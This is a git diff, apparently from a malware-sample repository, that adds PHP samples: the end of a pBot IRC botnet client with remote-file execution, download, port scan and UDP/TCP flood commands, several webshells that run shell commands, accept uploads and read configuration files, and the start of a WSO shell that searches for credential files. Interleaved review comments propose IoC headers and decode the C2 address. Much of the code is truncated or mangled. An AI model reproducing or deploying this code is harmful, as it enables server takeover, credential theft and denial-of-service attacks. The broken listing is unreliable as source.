+ $fileUrl = $mcmd[1]; + + if( !empty( $fileUrl ) ) + { + $urli = parse_url( $fileUrl ); + + if( !empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) ) + { + $fp = fsockopen( $urli['host'], 80, $errno, $errstr, 5 ); + + if( $fp ) + { + $out = "GET /".$urli['path'].$urli['query']." HTTP/1.1\r\n"; + $out .= "Host: ".$urli['host']."\r\n"; + $out .= "Keep-Alive: 300\r\n"; + $out .= "Connection: keep-alive\r\n\r\n"; + fwrite( $fp, $out ); + + $get_data = ''; + + while(!feof($fp)) + { $get_data .= fgets( $fp, 256 ); } + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$fileUrl ); + break; + } + } + } + + $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$fileUrl ); + break; + } + case "base64": + { + $str_ed = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 ); + switch( $mcmd[1] ) + { + case "encode": + { + $this->privmsg( $this->get_chan( ), "[ base64 ] encode [ '".$str_ed."' -> '".base64_encode($str_ed). + break; + } + case "decode": + { + $this->privmsg( $this->get_chan( ), "[ base64 ] decode [ '".$str_ed."' -> '".base64_decode($str_ed). + break; + } + } + break; + } + case "md5": + { + $str_md5 = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 ); + $this->privmsg( $this->get_chan( ), "[ md5 ] [ '".$str_md5."' -> '".md5($str_md5)."' ]" ); + break; + } + case "dns": + { + if(isset($mcmd[1])) + { + $ip = explode(".",$mcmd[1]); + if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) + && is_numeric($ip[2]) && is_numeric($ip[3])) + { + $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyaddr($mcmd + } + else + { + $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." 
=> ".gethostbyname($mcmd + } + } + break; + } + case "exit": + { + fclose( $this->conn ); + exit( ); + break; + } + case "restart": + { + $this->privmsg( $this->get_chan( ), "[ restart ] executed by [".$nick."]" ); + $this->send( "QUIT :restart command from ".$nick ); + fclose( $this->conn ); + $this->start(); + break; + } + case "bs": + { + if( $this->is_safe( ) ) + { + ini_restore( "safe_mode" ); + ini_restore( "open_basedir" ); + } + + $safemode = "on"; + if( !$this->is_safe( ) ) + { + $safemode = "off"; + $this->set_nick(); + } + $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode ); + } + case "moveserver": + { + if( count( $mcmd ) > 3 ) + { + $server = $mcmd[1]; + $port = $mcmd[2]; + $channel = $mcmd[3]; + $key = $mcmd[4]; + + if( $this->using_encode ) + { + $this->config[ 'server' ] = base64_encode( $server ); + $this->config[ 'chan' ] = base64_encode( str_replace( "#", "", $channel ) ); + $this->config[ 'key' ] = base64_encode( $key ); + } + else + { + $this->config[ 'server' ] = $server; + $this->config[ 'chan' ] = str_replace( "#", "", $channel ); + $this->config[ 'key' ] = $key; + } + + $this->config[ 'port' ] = $port; + $this->privmsg( $this->get_chan( ), "[ moveserver ] ".$server." => ".$port." => ".$channel." => + $this->send( "QUIT :moveserver command from ".$nick ); + + fclose( $this->conn ); + $this->start(); + } + break; + } + case "whois": + { + $param2 = $mcmd[1]; + + if( !empty( $param2 ) ) + { + //do it + //http://ws.arin.net/whois/?queryinput=127.0.0.1 + $fp = fsockopen( "ws.arin.net", 80, $errno, $errstr, 30 ); + + if( $fp ) + { + $out = "GET /whois/?queryinput=$param2 HTTP/1.1\r\n"; + $out .= "Host: ws.arin.net\r\n"; + $out .= "Keep-Alive: 300\r\n"; + $out .= "Connection: keep-alive\r\n\r\n"; + fwrite( $fp, $out ); + + $whodata = ''; + while(!feof($fp)) + { + /*do nothing*/ + $whodata .= fread( $fp, 1024 ); + } + + $explk = explode( "
", $whodata ); + $explk = explode( "
", $explk[1] ); + $htmldat = strip_tags( $explk[0] ); + + fclose( $fp ); + + $this->privmsg( $this->get_chan( ), "[ whois ] $htmldat" ); + + }else{ + $this->privmsg( $this->get_chan( ), "[ whois ] Error: $errstr" ); + } + } + else + { + $this->privmsg( $this->get_chan( ), "[ whois ] Invalid params, use .whois " ); + } + break; + } + case "upftp": + { + //ftp://user:password@host.com + $pftp = parse_url( $mcmd[1] ); + $file = $mcmd[2]; + $dest = $mcmd[3]; + + if( empty( $pftp[ 'host' ] ) + || empty( $pftp[ 'user' ] ) + || empty( $pftp[ 'pass' ] ) + || empty( $file ) + || empty( $dest ) ) + { + $this->privmsg( $this->get_chan( ), "[ upftp ] URL line invalid!" ); + } + else + { + $conn_id = ftp_connect( $pftp[ 'host' ] ); + $login_result = ftp_login( $conn_id, $pftp[ 'user' ], $pftp[ 'pass' ] ); + + if( ( !$conn_id ) || ( !$login_result ) ) + { + $this->privmsg( $this->get_chan( ), "[ upftp ] FTP connection failed!" ); + } + else + { + $this->privmsg( $this->get_chan( ), "[ upftp ] Connected to ".$pftp[ 'host' ]." for user ".$pftp[ 'user + $upload = ftp_put( $conn_id, $dest, $file, FTP_BINARY ); + if( !$upload ) + { + $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload faled!" ); + } + else + { + $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload success!" ); + $this->privmsg( $this->get_chan( ), "[ upftp ] Uploaded '".$file."' to '".$dest."'" ); + } + } + } + break; + } + case "joinchan": + { + $channel = $mcmd[1]; + $key = $mcmd[2]; + $this->privmsg( $this->get_chan( ), "[ joinchan ] ".$channel." 
=> ".$key ); + $this->join( $channel, $key ); + break; + } + case "partchan": + { + $this->privmsg( $this->get_chan( ), "[ partchan ] ".$mcmd[1] ); + $this->send( "PART ".$mcmd[1] ); + } + case "vuln": + { + $server_name = $_SERVER['SERVER_NAME']; + $req_uri = $_SERVER['REQUEST_URI']; + + if( $server_name != "localhost" && $server_name != "127.0.0.1" ) + { + if( strlen( $server_name ) && strlen( $req_uri ) ) + { + $vuln = "http://".$server_name.$req_uri; + $this->privmsg( $this->get_chan( ), "[ getvuln ] ".$vuln ); + } + } + break; + } + case "download": + { + if( count( $mcmd ) > 2 ) + { + if( !$fp = fopen( $mcmd[ 2 ], "w" ) ) + { + $this->privmsg( $this->get_chan( ), "[ download ] Permission denied!" ); + } + else + { + if( !$get = file( $mcmd[ 1 ] ) ) + { + $this->privmsg( $this->get_chan( ), "[ download ] Download failed!" ); + } + else + { + for( $i=0; $i <= count( $get ); $i++ ) + { + fwrite( $fp, $get[ $i ] ); + } + $this->privmsg( $this->get_chan( ),"[ download ] URL [".$mcmd[ 1 ]."] to [".$mcmd[ 2 ]."]"); + } + fclose( $fp ); + } + } + else + { + $this->privmsg( $this->get_chan( ), "[ download ] Invalid Parameters, idiot!" ); + } + break; + } + case "pmsg": + { + $person = $mcmd[1]; + $text = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 ); + $this->privmsg( $this->get_chan( ), "[ pmsg ] ".$person." => ".$text ); + $this->privmsg( $person, $text ); + break; + } + case "pscan": + { + $host = $mcmd[1]; + $beginport = $mcmd[2]; + $endport = $mcmd[3]; + $open_ports = "Open Port List for ".$host.": "; + + for($i = $beginport; $i < $endport; $i++) + { + if( $this->scanport( $host, $i ) ) + { + $open_ports .= "|".$i; + } + } + + $this->privmsg( $this->get_chan( ), $open_ports ); + break; + } + case "software": + { + $this->privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] ); + break; + } + case "snf": + { + $this->config[ 'nickform' ] = $mcmd[ 1 ]; + $this->privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]." 
]" ); + break; + } + case "randnick": + { + $this->set_nick(); + break; + } + case "unauth": + { + $this->remove_auth( $host ); + $this->privmsg( $this->get_chan( ), "[ auth ] Logout [ ".$nick." ]" ); + break; + } + case "urlbomb": + { + $this->urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] ); + break; + } + case "udpflood": + { + if( count( $mcmd ) > 3 ) + { + $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); + } + break; + } + case "tcpflood": + { + if( count( $mcmd ) > 5 ) + { + $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); + } + break; + } + } + } + } + break; + } + } + } + $old_buf = $this->buf; + } + $this->start(); + } + + function scanport( $host, $port ) + { + if( fsockopen( $host, $port, $e, $s ) ) + { + return 1; + } + return 0; + } + + function urlbomb( $host, $path, $times, $mode = 0 ) + { + if( !isset( $host ) || !isset( $path ) || !isset( $times ) ) + return; + + $this->privmsg( $this->get_chan( ), '[ urlbomb ] started! [ '.$host.'/'.$path.' ]' ); + + $success = 0; + for( $i = 0; $i < $times; $i++ ) + { + $fp = fsockopen( $host, 80, $errno, $errstr, 30 ); + if( $fp ) + { + $out = "GET /".$path." HTTP/1.1\r\n"; + $out .= "Host: ".$host."\r\n"; + $out .= "Keep-Alive: 300\r\n"; + $out .= "Connection: keep-alive\r\n\r\n"; + fwrite( $fp, $out ); + + if( $mode != 0 ) + { + while(!feof($fp)){/*do nothing*/} + } + + fclose( $fp ); + + $success++; + } + } + + $this->privmsg( $this->get_chan( ), '[ urlbomb ] finished! [ '.$host.'/'.$path.' ][ success: '.$success.' 
]' ); + } + + function udpflood( $host, $packetsize, $time ) + { + $this->privmsg( $this->get_chan( ),"[ udpflood ] Started [".$host."]" ); + $packet = ""; + for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } + $timei = time(); + $i = 0; + while(time()-$timei < $time) + { + $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); + fwrite($fp,$packet); + fclose($fp); + $i++; + } + $env = $i * $packetsize; + $env = $env / 1048576; + $vel = $env / $time; + $vel = round($vel); + $env = round($env); + $this->privmsg( $this->get_chan( ),"[ udpflood ] $env MB Sent / $vel MB/s "); + } + + function tcpflood($host,$packets,$packetsize,$port,$delay) + { + $this->privmsg( $this->get_chan( ),"[\2TcpFlood Started!\2]"); + $packet = ""; + for($i=0;$i<$packetsize;$i++) + $packet .= chr(mt_rand(1,256)); + + for($i=0;$i<$packets;$i++) + { + if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) + { + $this->privmsg( $this->get_chan( ),"[\2TcpFlood\2]: Error: <$e>"); + return 0; + } + else + { + fwrite($fp,$packet); + fclose($fp); + } + sleep($delay); + } + $this->privmsg( $this->get_chan( ),"[\2TcpFlood Finished!\2]: Config - $packets for $host:$port."); + } + + function send($msg) + { + fwrite($this->conn,"$msg\r\n"); + } + + function join($chan,$key=NULL) + { + $this->send("JOIN $chan $key"); + } + + function privmsg($to,$msg) + { + $this->send("PRIVMSG $to :$msg"); + } + + function notice($to,$msg) + { + $this->send("NOTICE $to :$msg"); + } + + function set_nick() + { + $prefix = "[lnx]"; + if(isset($_SERVER['SERVER_SOFTWARE'])) + { + if( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "apache" ) ) + $prefix = "[A]"; + elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "iis" ) ) + $prefix = "[I]"; + elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "xitami" ) ) + $prefix = "[X]"; + else + $prefix = "[U]"; + } + + if( !$this->is_safe( ) ) + { + $prefix .= "[win32]"; + } + + $random_number = ""; + for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ 
)
+ {
+ $random_number .= mt_rand( 0, 9 );
+ }
+
+ $this->nick = sprintf( $prefix.$this->config[ 'nickform' ], $random_number );
+ $this->send("NICK ".$this->nick);
+ }
+
+ function parse_url_s( $url )
+ {
+ $URLpcs = ( parse_url( $url ) );
+ $PathPcs = explode( "/", $URLpcs['path'] );
+ $URLpcs['file'] = end( $PathPcs );
+ unset( $PathPcs[ key( $PathPcs ) ] );
+ $URLpcs['dir'] = implode("/",$PathPcs);
+
+ $fileext = explode( '.', $URLpcs['file'] );
+
+ if(count($fileext))
+ {
+ $URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ];
+ }
+
+ return ($URLpcs);
+ }
+ }
+
+ $bot = new pBot;
+ $bot->start();
+
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php b/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php
new file mode 100644
index 0000000..af757c1
--- /dev/null
+++ b/Deobfuscated/WebShell_5baf031af52d9d0b7c14b0a737a371e8fbfd62e5.php
@@ -0,0 +1,27 @@
+RevSlideR 2015
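Review bot: The bot's command-and-control settings are committed only in encoded form and the file has no analyst header, so its indicators cannot be searched for in this repository. In the visible part of the `$config` array at the top of the hunk, `server` and `chan` are base64; they decode to `78.140.173.43` and `1x33x7`, next to `'port' => 9595`. I would add a comment above the array such as `// IoC: IRC C2 78.140.173.43:9595, channel #1x33x7, nick "<prefix>logging[<digits>]", command prefix "!"`, which gives responders an egress filter and a log pattern without running the sample. As rendered here several statements are cut short (the `base64` and `dns` cases, and two `$this->ex(...)` calls with no terminator), so the header should also say that the listing is incomplete and does not parse.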

"; +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "4,1ON(BuSuX)"; +} +else {$safemode = false; $hsafemode = "OFF(WoKeH)";} +$os = wordwrap(php_uname(),90,"
",1); +$xos = "Safe-mode:[Safe-mode:".$hsafemode."] 7 [OS:".$os."]"; +echo "
".$xos."

"; + +if(isset($_GET['x'])){ +echo "PiNDaH 2015

"; +$source = $_SERVER['SCRIPT_FILENAME']; +$desti =$_SERVER['DOCUMENT_ROOT']."/default.php"; +copy($source, $desti); +} + +echo '
'; +echo '
'; +if( $_POST['_upl'] == "Upload" ) { + if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } + else { echo 'Upload GAGAL !!!

'; }
+}
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php b/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php
new file mode 100644
index 0000000..5986cf6
--- /dev/null
+++ b/Deobfuscated/WebShell_71826e9fb350611ac274038abea50c230549f94d.php
@@ -0,0 +1,74 @@
+jalanG
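Review bot: This sample copies itself when it is requested with an `x` query parameter, and it is committed under an executable `.php` name with mode 100644, so a checkout that ends up below a served document root is live. The line `copy($source, $desti);` writes `$_SERVER['SCRIPT_FILENAME']` to `$_SERVER['DOCUMENT_ROOT']."/default.php"`, and the `_upl` branch stores an uploaded file under its client-supplied name with no authentication visible in the hunk. I would keep the samples under an inert extension (for example `.php.txt`) or inside an archive; the same applies to the other `Deobfuscated/*.php` and `Obfuscated/*.php` files this commit adds. A header comment such as `// IoC: drops DOCUMENT_ROOT/default.php; page strings "RevSlideR 2015", "PiNDaH 2015"` would give responders something to hunt for.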
"; +$dataku = "POWERED BY jalanG"; +$dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER"; +$dataku3 = "Contact Admin YM :ready.buyer"; +echo "".$dataku."
"; +echo "".$dataku2."
"; +echo "".$dataku3."
"; +echo "".$security."
"; +$cur_user="(".get_current_user().")"; +echo "User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."
"; +echo "Uname : ".php_uname()."
"; +function pwd() { +$cwd = getcwd(); +if($u=strrpos($cwd,'/')){ +if($u!=strlen($cwd)-1){ +return $cwd.'/';} +else{return $cwd;}; +} +elseif($u=strrpos($cwd,'\\')){ +if($u!=strlen($cwd)-1){ +return $cwd.'\\';} +else{return $cwd;}; +}; +} +echo '
Command
'; +echo '
Upload File

New name:
'; +if(isset($_POST['submit'])){ +$uploaddir = pwd(); +if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; +move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); +if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){ +echo "Upload Failed"; +} else { echo "Upload Success to ".$uploaddir.$name." Succes! "; } +} +if(isset($_POST['command'])){ +$cmd = $_POST['cmd']; +echo "
".shell_exec($cmd)."
"; +} +elseif(isset($_GET['cmd'])){ +$comd = $_GET['cmd']; +echo "
".shell_exec($comd)."
"; +} +else { echo "
".shell_exec('ls -la')."
";
+}
+
+if(isset($_GET['baca'])){
+$conf = file_get_contents("../../configuration.php");
+echo $conf;
+}
+?>
\ No newline at end of file
diff --git a/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php b/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php
new file mode 100644
index 0000000..82f3f72
--- /dev/null
+++ b/Deobfuscated/WebShell_a05811ee776c0536a890dba465e501168851df6c.php
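Review bot: Nothing in the file records that a host carrying it must be treated as having leaked its application secrets: the `baca` branch at the end echoes `file_get_contents("../../configuration.php")` to any requester. The same page, with no authentication visible in the hunk, passes `$_POST['cmd']` (when `command` is posted) or `$_GET['cmd']` to `shell_exec`, and runs `ls -la` when neither is set. I would add a header comment such as `// IoC: requests carrying "cmd" or "baca" parameters; ../../configuration.php disclosed - rotate the credentials it holds`. For triage it is also worth noting in that header that `move_uploaded_file` is called twice with the same arguments, so the "Upload Success"/"Upload Failed" text in a captured response does not show whether a file was actually written.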
@@ -0,0 +1,1322 @@ + "dir", + "Findindex . phpincurrentdir" => "dir / s / w / bindex . php", + "Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php", + "Showactiveconnections" => "netstat - an", + "Showrunningservices" => "netstart", + "Useraccounts" => "netuser", + "Showcomputers" => "netview", + "ARPTable" => "arp - a", + "IPConfiguration" => "ipconfig / all" + ); +else + $aliases = array( + "Listdir" => "ls - lha", + "listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va", + "showopenedports" => "netstat - an | grep - ilisten", + "Find" => "", + "findallsuidfiles" => "find / -typef - perm - 04000 - ls", + "findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls", + "findallsgidfiles" => "find / -typef - perm - 02000 - ls", + "findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls", + "findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php", + "findconfig * files" => "find / -typef - name\"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); + function wsoHeader() { + if (empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; + global $color; + echo "" . $_SERVER['HTTP_HOST'] . "- WSO [Black-ID] " . VERSION . " + + +
+
+ + + + + + +
"; + $freeSpace = @diskfreespace($GLOBALS['cwd']); + $totalSpace = @disk_total_space($GLOBALS['cwd']); + $totalSpace = $totalSpace ? $totalSpace : 1; + $release = @php_uname('r'); + $kernel = @php_uname('s'); + $exdblink = 'http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description='; + if (strpos('Linux', $kernel) !== false) $exdblink.= urlencode('Linux Kernel ' . substr($release, 0, 6)); + else $exdblink.= urlencode($kernel . ' ' . substr($release, 0, 3)); + if (!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + } else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; + } + $cwd_links = ''; + $path = explode("/", $GLOBALS['cwd']); + $n = count($path); + for ($i = 0;$i < $n - 1;$i++) { + $cwd_links.= "" . $path[$i] . "/"; + } + $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); + $opt_charsets = ''; + foreach ($charsets as $item) $opt_charsets.= ''; + $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Mass' => 'Mass', 'Domains' => 'Domain', 'Sql' => 'Sql', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Network' => 'Network'); + $m['Self remove'] = 'SelfRemove'; + $menu = ''; + foreach ($m as $k => $v) $menu.= '[' . $k . ']'; + $drives = ""; + if ($GLOBALS['os'] == 'win') { + foreach (range('c', 'z') as $drive) if (is_dir($drive . ':\')) + $drives .= ' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.':/\')" > ['.$drive.'] < / a > '; + } + echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd: + '.($GLOBALS['os'] == 'win'?' < br > Drives: + ':'').' < / span > < / td > '. + ' < td > < nobr > '.substr(@php_uname(), 0, 120).' 
< ahref = "http://www.google.com/search?q='.urlencode(@php_uname()).'"target = "_blank" > [Google] < / a > < ahref = "'.$exdblink.'"target = _blank > [Exploit - DB] < / a > < / nobr > < br > '.$uid.'('.$user.') < span > Group: < / span > '.$gid.'('.$group.') < br > '.@phpversion().' < span > Safemode: < / span > '.($GLOBALS['safe_mode']?' < fontcolor = red > ON < / font > ':' < fontcolor = #00bb00>OFF
').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.wsoViewSize($totalSpace).' Free: '.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)
'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.''. + '
Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
[ Bing ] | [ Zone-H ]
' . '' . $menu . '
'; + } + function wsoFooter() { + $is_writable = is_writable($GLOBALS['cwd']) ? "[ Writeable ]" : "[ Not writable ]"; + echo " +
+ + + + + + + + + + +
Change dir:
Read file:
Make dir:
$is_writable
Make file:
$is_writable
Execute:
+ + + + + Upload file:
$is_writable
"; + } + if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false)) { + function posix_getpwuid($p) { + return false; + } + } + if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false)) { + function posix_getgrgid($p) { + return false; + } + } + function wsoEx($in) { + $out = ''; + if (function_exists('exec')) { + @exec($in, $out); + $out = @join(" +", $out); + } elseif (function_exists('passthru')) { + ob_start(); + @passthru($in); + $out = ob_get_clean(); + } elseif (function_exists('system')) { + ob_start(); + @system($in); + $out = ob_get_clean(); + } elseif (function_exists('shell_exec')) { + $out = shell_exec($in); + } elseif (is_resource($f = @popen($in, "r"))) { + $out = ""; + while (!@feof($f)) $out.= fread($f, 1024); + pclose($f); + } + return $out; + } + function wsoViewSize($s) { + if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB'; + elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB'; + elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB'; + else return $s . ' B'; + } + function wsoPerms($p) { + if (($p & 0xC000) == 0xC000) $i = 's'; + elseif (($p & 0xA000) == 0xA000) $i = 'l'; + elseif (($p & 0x8000) == 0x8000) $i = '-'; + elseif (($p & 0x6000) == 0x6000) $i = 'b'; + elseif (($p & 0x4000) == 0x4000) $i = 'd'; + elseif (($p & 0x2000) == 0x2000) $i = 'c'; + elseif (($p & 0x1000) == 0x1000) $i = 'p'; + else $i = 'u'; + $i.= (($p & 0x0100) ? 'r' : '-'); + $i.= (($p & 0x0080) ? 'w' : '-'); + $i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-')); + $i.= (($p & 0x0020) ? 'r' : '-'); + $i.= (($p & 0x0010) ? 'w' : '-'); + $i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-')); + $i.= (($p & 0x0004) ? 'r' : '-'); + $i.= (($p & 0x0002) ? 'w' : '-'); + $i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 
'T' : '-')); + return $i; + } + function wsoPermsColor($f) { + if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; + elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; + else return '' . wsoPerms(@fileperms($f)) . ''; + } + if (!function_exists("scandir")) { + function scandir($dir) { + $dh = opendir($dir); + while (false !== ($filename = readdir($dh))) { + $files[] = $filename; + } + return $files; + } + } + function wsoWhich($p) { + $path = wsoEx('which ' . $p); + if (!empty($path)) return $path; + return false; + } + function actionSecInfo() { + wsoHeader(); + echo '

Server security information

'; + function wsoSecParam($n, $v) { + $v = trim($v); + if ($v) { + echo '' . $n . ': '; + if (strpos($v, " +") === false) echo $v . '
'; + else echo '
' . $v . '
'; + } + } + wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); + wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); + wsoSecParam('Open base dir', @ini_get('open_basedir')); + wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); + $temp = array(); + if (function_exists('mysql_get_client_info')) $temp[] = "MySql (" . mysql_get_client_info() . ")"; + if (function_exists('mssql_connect')) $temp[] = "MSSQL"; + if (function_exists('pg_connect')) $temp[] = "PostgreSQL"; + if (function_exists('oci_connect')) $temp[] = "Oracle"; + wsoSecParam('Supported databases', implode(', ', $temp)); + echo '
'; + if ($GLOBALS['os'] == 'nix') { + $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); + $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); + $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); + wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes [view]" : 'no'); + wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes [view]" : 'no'); + wsoSecParam('OS version', @file_get_contents('/proc/version')); + wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); + if (!$GLOBALS['safe_mode']) { + echo '
'; + $temp = array(); + foreach ($userful as $item) if (wsoWhich($item)) { + $temp[] = $item; + } + wsoSecParam('Userful', implode(', ', $temp)); + $temp = array(); + foreach ($danger as $item) if (wsoWhich($item)) { + $temp[] = $item; + } + wsoSecParam('Danger', implode(', ', $temp)); + $temp = array(); + foreach ($downloaders as $item) if (wsoWhich($item)) { + $temp[] = $item; + } + wsoSecParam('Downloaders', implode(', ', $temp)); + echo '
'; + wsoSecParam('HDD space', wsoEx('df -h')); + wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); + } + } else { + wsoSecParam('OS Version', wsoEx('ver')); + wsoSecParam('Account Settings', wsoEx('net accounts')); + wsoSecParam('User Accounts', wsoEx('net user')); + } + echo '
';
+ wsoFooter();
+ }
+ function actionFilesMan() {
+ wsoHeader();
+ echo '

File manager

